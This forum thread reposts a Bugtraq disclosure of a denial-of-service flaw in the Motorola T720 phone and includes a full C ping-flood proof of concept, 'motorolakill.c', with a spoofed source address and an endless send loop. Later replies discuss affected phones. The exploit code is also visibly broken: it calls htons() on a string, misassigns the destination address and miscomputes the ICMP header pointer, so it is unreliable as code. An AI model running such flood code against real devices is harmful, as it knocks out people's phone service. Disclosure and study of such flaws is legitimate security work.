Results 1 to 7 of 7

Thread: Motorola T720 Vulnerability

  1. #1
    Senior Member
    Join Date
    Jan 2003
    Posts
    3,915

    Motorola T720 Vulnerability

    Hey Hey,

    I was going to post this on my other thread, since it kinda applies there. However we were more discussing virii and worms and what not over there, and this is a DoS. So I'll start a new thread about it, besides this forum is kinda empty.

    This was posted to bugtraq today and I thought some people might find it kinda interesting. I thought it was an interesting read because I own this phone, having it in my hand right now, and I know around here at least, it is a fairly common phone.

    Anyways here's the post:

    The bug
    ########

    The vulnerability lies within the TCP/IP stack of the Motorola T720 cell phone. When the phone receives an abnormal amount of IP traffic, the phone powers-off when the user attempts to access the network (e.g through the WAP browser).

    The vulnerability can be reproduced in the following
    way:

    -
    1) Connect the phone to the Internet.
    2) Flood the device with IP traffic (i.e SYN packets or ICMP_ECHO requests (ping packets)).
    3) Run the WAP browser.
    -

    At this point, the phone should power-off, and lose network connectivity.

    --
    NOTE:

    This vulnerability is likely due to a bug in the phone's IP implementation which bails when a certain backlog of IP packets is exceeded.
    --


    The exploit
    ############

    A simple proof-of-concept is demonstrated below:


    # motorolakill.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>

    int main(int argc, char *argv[]) {
    if(argc < 2) {
    printf("Usage: %s <host>\n", argv[0]);
    exit(0);
    }

    int sock;
    char packet[5000];
    int on = 1;
    struct sockaddr_in dest;
    struct hostent *host;
    struct iphdr *ip = (struct iphdr *) packet;
    struct icmphdr *icmp = (struct icmp *) packet
    + sizeof(struct iphdr);
    if((host = gethostbyname(argv[1])) == NULL) {
    printf("Couldn't resolve host!\n");
    exit(-1);
    }

    if((sock = socket(AF_INET, SOCK_RAW,
    IPPROTO_ICMP)) == -1) {
    printf("Couldn't make socket!\n");
    printf("You must be root to create a raw socket.\n");
    exit(-1);
    }

    if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0) {
    perror("setsockopt");
    exit(1);
    }

    dest.sin_family = AF_INET;
    dest.sin_addr = *((struct in_addr *)host->h_addr);
    ip->ihl = 5;
    ip->id = htons(1337);
    ip->ttl = 255;
    ip->tos = 0;
    ip->protocol = IPPROTO_ICMP;
    ip->version = 4;
    ip->frag_off = 0;
    ip->saddr = htons("1.3.3.7");
    ip->daddr = inet_ntoa(dest.sin_addr);
    ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
    ip->check = 0;
    icmp->checksum = 0;
    icmp->type = ICMP_ECHO;
    icmp->code = 0;
    printf("Ping flooding %s!\n", argv[1]);

    /* begin flooding here. */
    while(1) {
    sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
    }
    return(0);
    }
    # EOF motorolakill.c


    Use the steps listed above to reproduce the vulnerability. The above programs shouldn't need long to cause the phone to poweroff.

    (please note the phone will only poweroff if the user attempts to access the network. If the phone is sitting idle, it won't be affected. The user must open the WAP browser during the attack, for example.
    This will cause the phone to poweroff quickly.)



    The fix
    ########

    No solution exists. Possible workarounds are:

    - Connect the phone through a router (possibly via GSM to allow roaming), filtering out all malicious traffic to the device.

    - Use another system as a gateway system, firewalling the cellphone, and filtering traffic to the device.
    I plan on testing this as soon as I get a chance, however I must first create a small website to give me my IP since I have no idea what my IP address is for my cell phone.

    Anyways check it out and enjoy.

    Peace,
    HT

  2. #2
    Junior Member
    Join Date
    Dec 2003
    Posts
    5
    good post HTRegz. Very informative since my dad owns one of those buggers too.

  3. #3
    Yeah.... can't wait for cell phone firewalls to come out. Good post HT

  4. #4
    Very interesting indeed...very interesting.

    Quite possibly this will work with alot more phones with web capability as well..something to test...very interesting indeed.
    Signature image is too tall!

  5. #5
    Senior Member Info_Au's Avatar
    Join Date
    Jul 2001
    Location
    Melbourne
    Posts
    273
    I know Symbian has about 5 O/S's that are available and trying to use some programs on other symbian platforms fail to run or install.
    So i can imagine that the new virus would have to know several O/S to work.

    No outlook in my phone...im glad!!

  6. #6
    HeadShot Master N1nja Cybr1d's Avatar
    Join Date
    Jul 2003
    Location
    Boston, MA
    Posts
    1,840
    Hmm...thats quite intersting and also informative. I've had a few customers come to me with that problem...but I was unaware of the bug. I just sold them new batteries thinking they short circuited or something. Thank you

    EDIT:

    Ok...lets get a different scenario. In the US AT&T wireless uses Mlife or mMode for their wireless internet. When a customer purchases a GSM/GPRS phone, the dealer has to subscribe the customer to the mMode service. A customer could use the phone without mMode without any problem, they just wouldnt have access to the internet. My point is, that not all T720 phones would suffer from this vulnerability.

    If you want to dig deeper into this, take into consideration the Siemens C56 and the Siemens M56, which both show similiar symptoms to the T720. I've seen quite a few customers who tell me they phone just shuts off by itself.

  7. #7
    The machines are coming! They have more control, we must stop them while we still can!!!!!!!!!
    Signature image is too tall!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •